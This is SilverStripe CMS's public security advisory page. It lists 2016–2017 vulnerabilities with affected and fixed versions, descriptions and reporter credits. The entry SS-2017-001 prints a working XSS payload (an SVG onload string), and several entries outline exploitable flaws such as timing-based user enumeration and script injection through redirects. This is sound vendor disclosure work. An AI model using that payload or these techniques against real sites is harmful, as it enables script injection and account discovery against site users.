Security Releases
When potential security holes are discovered in SilverStripe's supported modules, we produce security releases to ensure that you are able to promptly secure your SilverStripe websites (check our security release process). All releases are available on our download page, and are announced on our forums (register to subscribe). Vulnerabilities in releases are disclosed here. Please subscribe to our security release RSS feed and pre-announcement mailing list to stay updated.
-
SS-2017-007: CSV Excel Macro Injection
- Severity:
- Low (?)
- Identifier:
- ss-2017-007
- Versions Affected:
- 3.5.5 and below, 3.6.0 to 3.6.2, 4.0.0
- Versions Fixed:
- 3.5.6, 3.6.3, 4.0.1
- Release Date:
- 2017-12-07
In the CSV export feature of the CMS it's possible for the output to contain macros and scripts, which if imported without sanitisation into software (including Microsoft Excel) may be executed.
In order to safeguard against this threat all potentially executable cell values exported from CSV will be prepended with a literal tab character.
Reported by Ishaq Mohammed
-
SS-2017-006: Session user agent change detection
- Severity:
- Low (?)
- Identifier:
- ss-2017-006
- Versions Affected:
- 3.5.5 and below, 3.6.0 to 3.6.2
- Versions Fixed:
- 3.5.6, 3.6.3
- Release Date:
- 2017-12-07
A security protection device in Session designed to protect session hijacking was not correctly functioning. This function intended to protect user sessions by detecting changes in the User-Agent header, but modifications to this header were not correctly invalidating the user session.
Reported by Patrick Nelson - https://catchyour.com/
-
SS-2017-005: User enumeration via timing attack on login and password reset forms
- Severity:
- Medium (?)
- Identifier:
- SS-2017-005
- Versions Affected:
- 3.5.4 and below to 3.6.1
- Versions Fixed:
- 3.5.5, 3.6.2
- Release Date:
- 2017-09-28
User enumeration is possible by performing a timing attack on the login or password reset pages with user credentials.
Credit to Daniel Hensby (SilverStripe) and Erez Yalon (Checkmarx)
-
SS-2017-004: XSS in page history comparison
- Severity:
- Low (?)
- Identifier:
- SS-2017-004
- Versions Affected:
- 3.4.5 and below, 3.5.0 to 3.5.3
- Versions Fixed:
- 3.4.6, 3.5.4, 3.6.0
- Release Date:
- 2017-05-31
Authenticated user with page edit permission can craft HTML, which when rendered in a page history comparison can execute client scripts.
Credit to Anti Räis for reporting this issue.
-
SS-2017-003: XSS in RedirectorPage
- Severity:
- Low (?)
- Identifier:
- SS-2017-003
- Versions Affected:
- 3.4.5 and below, 3.5.0 to 3.5.3
- Versions Fixed:
- 3.4.6, 3.5.4, 3.6.0
- Release Date:
- 2017-05-31
RedirectorPage will allow users to specify a non-url malicious script as the redirection path without validation. Users which follow this url may allow this script to execute within their browser.
Credit to Wester for reporting this issue.
-
SS-2017-002: Member disclosure in login form
- Severity:
- Low (?)
- Identifier:
- SS-2017-002
- Versions Affected:
- 3.4.5 and below, 3.5.0 to 3.5.3
- Versions Fixed:
- 3.4.6, 3.5.4, 3.6.0
- Release Date:
- 2017-05-31
There is a user ID enumeration vulnerability in our brute force error messages.
- Users that don't exist in will never get a locked out message
- Users that do exist, will get a locked out message
This means an attacker can infer or confirm user details that exist in the member table.
This issue has been resolved by ensuring that login attempt logging and lockout process works equivalently for non-existent users as it does for existant users.
-
SS-2017-001: XSS In page name
- Severity:
- Low (?)
- Identifier:
- SS-2017-001
- Versions Affected:
- 3.5.1 and below
- Versions Fixed:
- 3.4.4, 3.5.2
- Release Date:
- 2017-01-31
Page name `"><svg/onload=alert(/xss/)>` will trigger an XSS alert.
Credit to
Edric Teo
https://smarterbitbybit.com -
SS-2016-016: XSS In CMSSecurity BackURL
- Severity:
- Low (?)
- Identifier:
- SS-2016-016
- Versions Affected:
- 3.1.20 and below, 3.2.0 to 3.2.5, 3.3.0 to 3.3.3
- Versions Fixed:
- 3.1.21, 3.2.6, 3.3.4, 3.4.2, 3.5.0
- Release Date:
- 2016-11-29
In follow up to SS-2016-001 there is yet a minor unresolved fix to incorrectly encoded URL.
Credit: David Júlio for reporting.
-
SS-2016-010: ReadOnly transformation for formfields exploitable
- Severity:
- Low (?)
- Identifier:
- SS-2016-010
- Versions Affected:
- 3.1.20 and below, 3.2.0 to 3.2.5, 3.3.0 to 3.3.3
- Versions Fixed:
- 3.1.21, 3.2.6, 3.3.4, 3.4.2, 3.5.0
- Release Date:
- 2016-11-29
Form fields returning isReadonly() as true are vulnerable to reflected XSS injections. This includes ReadonlyField, LookupField, HTMLReadonlyField, as well as special purpose fields like TimeField_Readonly. Values submitted to through these form fields are not filtered out from the form session data, and might be shown to the user depending on the form behaviour. For example, form validation errors cause the form to re-render with previously submitted values by default.
SilverStripe forms automatically load values from request data (GET and POST), which enables malicious use of URLs if your form uses these fields and doesn't overwrite data on form construction.
Readonly and disabled form fields are already filtered out in Form->saveInto(), so maliciously submitted data on these fields doesn't make it into the database unless you are accessing form values directly in your saving logic.
Discovered by employers of security-assessment.com, division of Dimension Data.
-
SS-2016-015: XSS In OptionsetField and CheckboxSetField
- Severity:
- Low (?)
- Identifier:
- ss-2016-015
- Versions Affected:
- 3.1.19, 3.2.4, 3.3.2. 3.4.0
- Versions Fixed:
- 3.1.20, 3.2.5, 3.3.3. 3.4.1
- Release Date:
- 2016-08-15
List of key / value pairs assigned to OptionsetField or CheckboxSetField do not have a default casting assigned to them. The effect of this is a potential XSS vulnerability in lists where either key or value contain unescaped HTML.
-
SS-2016-014: Pre-existing alc_enc cookies log users in if remember me is disabled
- Severity:
- Low (?)
- Identifier:
- ss-2016-014
- Versions Affected:
- 3.1.19, 3.2.4, 3.3.2. 3.4.0
- Versions Fixed:
- 3.1.20, 3.2.5, 3.3.3. 3.4.1
- Release Date:
- 2016-08-15
If remember me is on and users log in with the box checked, if the developer then disabled "remember me" function, any pre-existing cookies will continue to authenticate users.
Reported by Patrick Nelson - https://catchyour.com/
-
SS-2016-013: Member.Name isn't escaped
- Severity:
- Low (?)
- Identifier:
- ss-2016-013
- Versions Affected:
- 3.1.19, 3.2.4, 3.3.2. 3.4.0
- Versions Fixed:
- 3.1.20, 3.2.5, 3.3.3. 3.4.1
- Release Date:
- 2016-08-15
The core template framework/templates/Includes/GridField_print.ss uses "Printed by $Member.Name".
If the currently logged in members first name or surname contain XSS, this prints the raw HTML out, because Member->getName() just returns the raw FirstName + Surname as a string, which is injected directly.
Credit to Matt Peel for reporting.
-
SS-2016-012: Missing ACL on reports
- Severity:
- Low (?)
- Identifier:
- ss-2016-012
- Versions Affected:
- 3.1.19, 3.2.4, 3.3.2. 3.4.0
- Versions Fixed:
- 3.1.20, 3.2.5, 3.3.3. 3.4.1
- Release Date:
- 2016-08-15
The SS_Report, and the reports CMS section only checks canView() when listing the reports that can be viewed by the current user.
It does not (and should) perform canView checks when the report is actually viewed, so if you know the URL to a report and can otherwise access the Reports section of the CMS, you can view any report.
Credit to Matt Peel for reporting.
-
SS-2016-011: ChangePasswordForm doesn't check Member::canLogIn()
- Severity:
- Low (?)
- Identifier:
- ss-2016-011
- Versions Affected:
- 3.1.19, 3.2.4, 3.3.2. 3.4.0
- Versions Fixed:
- 3.1.20, 3.2.5, 3.3.3. 3.4.1
- Release Date:
- 2016-08-15
After performing a password reset, ChangePasswordForm::doChangePassword() logs in the user without checking Member::canLogIn(). This presents an issue for sites that are using the extension point in that method to deny access to users (for example members that have not been “approved”, or members that have had their access revoked temporarily). It looks like Member::canLogIn() was originally designed to only be used for checking whether the user is locked out (due to too many incorrect login attempts) but has been opened up to other uses.
Credit to Loz Calver
-
SS-2016-008: Password encryption salt expiry
- Severity:
- Low (?)
- Identifier:
- ss-2016-008
- Versions Affected:
- 3.1.19, 3.2.4, 3.3.2. 3.4.0
- Versions Fixed:
- 3.1.20, 3.2.5, 3.3.3. 3.4.1
- Release Date:
- 2016-08-15
When a user changes their password, the internal salt used for hashing their password is not updated.
Although this is not considered a security vulnerability, this behaviour has been improved to ensure the salt is reset on change of password.
Credit to Jono Menz.
